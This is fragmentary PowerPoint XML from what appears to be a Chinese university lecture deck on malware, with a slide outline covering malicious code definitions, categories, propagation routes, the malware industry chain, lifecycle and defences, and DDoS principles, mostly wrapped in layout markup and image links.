          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="6248400"/>
            <a:ext cx="3429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ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr kumimoji="0" sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82112E89-4F9F-4BBB-ADC5-8715BF1EDF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr kumimoji="0" sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1FC575EB-454B-4E49-B6EB-4190CE40B616}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="strtegic1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40407972-49F7-446E-AF91-DD4DAD2956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219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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D493F06E-C5F8-4764-87F2-6577C9325605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="1981200"/>
            <a:ext cx="7620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4683" r:id="rId1"/>
    <p:sldLayoutId id="2147484672" r:id="rId2"/>
    <p:sldLayoutId id="2147484673" r:id="rId3"/>
    <p:sldLayoutId id="2147484674" r:id="rId4"/>
    <p:sldLayoutId id="2147484675" r:id="rId5"/>
    <p:sldLayoutId id="2147484676" r:id="rId6"/>
    <p:sldLayoutId id="2147484677" r:id="rId7"/>
    <p:sldLayoutId id="2147484678" r:id="rId8"/>
    <p:sldLayoutId id="2147484679" r:id="rId9"/>
    <p:sldLayoutId id="2147484680" r:id="rId10"/>
    <p:sldLayoutId id="2147484681" r:id="rId11"/>
    <p:sldLayoutId id="2147484682" r:id="rId12"/>
    <p:sldLayoutId id="2147484684" r:id="rId13"/>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70F2C16E-0E2F-4FCF-A969-52278A104106}"/>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文本占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B63BCF6-7404-4BFB-B545-41B76DB5EC37}"/>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0E55F74-0DEC-4A94-8C5E-E21357402D3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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr kumimoji="0" sz="900">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0334AE28-A06B-4511-86CF-DEDE0CEEB445}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48A30AA9-E95A-4B9A-8656-CCBC4CD0065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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr kumimoji="0" sz="900">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{415CB6B6-B309-43FC-90B7-94ACDB5749AF}"/>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kumimoji="0" sz="900">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{88C0F95B-F130-4D34-A379-1B1E4976C304}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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Lst>
  <p:hf sldNum="0" hdr="0" ftr="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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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backup/rootkit"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it.rising.com.cn/Channels/imgs/h000/h11/img200708151127420.PNG"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jpeg"/><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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.gi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48.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.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49.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide138.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70.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.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51.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.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4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file:///J:\2007&#19979;\cybersec\2\&#29066;&#29483;&#28903;&#39321;"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jump2.bdimg.com/safecheck/index?url=rN3wPs8te/pL4AOY0zAwhz3wi8AXlR5gsMEbyYdIw63noHItYAgrnYiyBcjikYbC+9Xua/7RlA1p1Hkji89WFVeOHekhQ2vZwlXWIssB3fVIOGT8ajJwF/+7r08zvbSaVHibX/89tN5P/Rr7XC8+FL7oOkrpH3QtLJLBJ3fnW81VhkCE6zEaSMqrwRgpxE70MDxm7iZ2BjQ=" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jump2.bdimg.com/safecheck/index?url=rN3wPs8te/pL4AOY0zAwhz3wi8AXlR5gsMEbyYdIw62kz3USeWBahyqoTAeLVnozFHHs+mEw5gUripOOA15C4U+GRIwDgEI46b99l0XyUM/jR49NyMTc/6qmUGNB+hoB/7uvTzO9tJpUeJtf/z203k/9GvtcLz4Uvug6SukfdC0sksEnd+dbzVWGQITrMRpIyqvBGCnETvQwPGbuJnYGNA==" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jump2.bdimg.com/safecheck/index?url=rN3wPs8te/pL4AOY0zAwhz3wi8AXlR5gsMEbyYdIw63YfCIpI+87Q5+IuPbnCta1+9Xua/7RlA1p1Hkji89WFVeOHekhQ2vZwlXWIssB3fVIOGT8ajJwF/+7r08zvbSaVHibX/89tN5P/Rr7XC8+FL7oOkrpH3QtLJLBJ3fnW81VhkCE6zEaSMqrwRgpxE70MDxm7iZ2BjQ="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ECEC4D4-8901-4006-9431-0F47FA7E82F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357438" y="1071563"/>
            <a:ext cx="6500812" cy="2709862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第十章：恶意软件</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EC2737-AC36-4D17-B535-04C55ED78E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635375" y="4005263"/>
            <a:ext cx="5257800" cy="1752600"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>何高峰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>hegaofeng@njupt.edu.cn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D6C3B67A-CCA3-495F-8D98-25D01DCC9889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>本讲提纲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACA4BB1-A0ED-44F1-A2C5-4A3A004D5DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的定义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的分类</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的典型破坏功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的传播途径与病毒产业链</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的完整生命周期及防护手段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6 DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击基本原理</a:t>
            </a:r>
          </a:p>
          <a:p>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9506" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBF34DFB-94A1-420C-9CF0-C4F594E5DD25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码传播途径与病毒产业链</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149507" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E726A1D0-16CA-4B43-B255-605339196189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="149508" name="图片 1" descr="img200707251746360">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71781FB-9BB6-406F-AA63-5DC35FEDB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2000250"/>
            <a:ext cx="7621587"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3009C881-9F2E-479F-93F0-F3BF51C2C148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150531" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DB72B3-FD33-48FE-B3E1-2466B6575E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150532" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E4C70C-EA6F-4ED3-9738-7D564BCD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15875"/>
            <a:ext cx="795655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578" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89E2C8F-054A-430E-BB77-76949552D057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152579" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA0111D-324E-4EEF-882C-1A2D0D669F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152580" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3596DFDB-4C66-43CF-979C-D52ED1757C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3475" y="501650"/>
            <a:ext cx="8096250" cy="590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F0312B97-DB88-4E2B-9749-589D99EB5483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>恶意代码的完整生命周期及防护手段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283651" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF337CD-86C4-48CF-866C-58AB1F59F964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="2924175"/>
            <a:ext cx="863600" cy="1439863"/>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寻找目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283652" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C188E9-7671-4851-AB25-DBD656D310E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843213" y="2924175"/>
            <a:ext cx="863600" cy="1439863"/>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283653" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C84EFA-4C2E-4DBE-A42F-2546623D595A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="2924175"/>
            <a:ext cx="863600" cy="1439863"/>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283654" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E279D41-5962-4F1F-823C-B0FCBA52540E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="2924175"/>
            <a:ext cx="863600" cy="1439863"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="283655" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1618300E-53DF-482E-978F-313105377F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="283651" idx="3"/>
            <a:endCxn id="283652" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1474788" y="3644900"/>
            <a:ext cx="1368425"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283656" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AFB2171-13D1-4ECC-8FBD-A7F7CA6E416A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="283652" idx="3"/>
            <a:endCxn id="283653" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3706813" y="3644900"/>
            <a:ext cx="1657350"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283657" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98054D6C-F128-4C2D-81ED-6C46E9F429C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="283653" idx="3"/>
            <a:endCxn id="283654" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227763" y="3644900"/>
            <a:ext cx="1223962"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sp>
        <p:nvSpPr>
          <p:cNvPr id="283658" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A13C6531-C2CA-4B30-A393-60B90914446B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4498975" y="2492375"/>
            <a:ext cx="1588" cy="2376488"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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3659" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02D587-E817-4E5C-8CB2-331F126737E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2051050" y="2565400"/>
            <a:ext cx="1588" cy="2376488"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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3660" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D2D3C8B-5F9E-41E2-9BEA-84CBE670E846}"/>
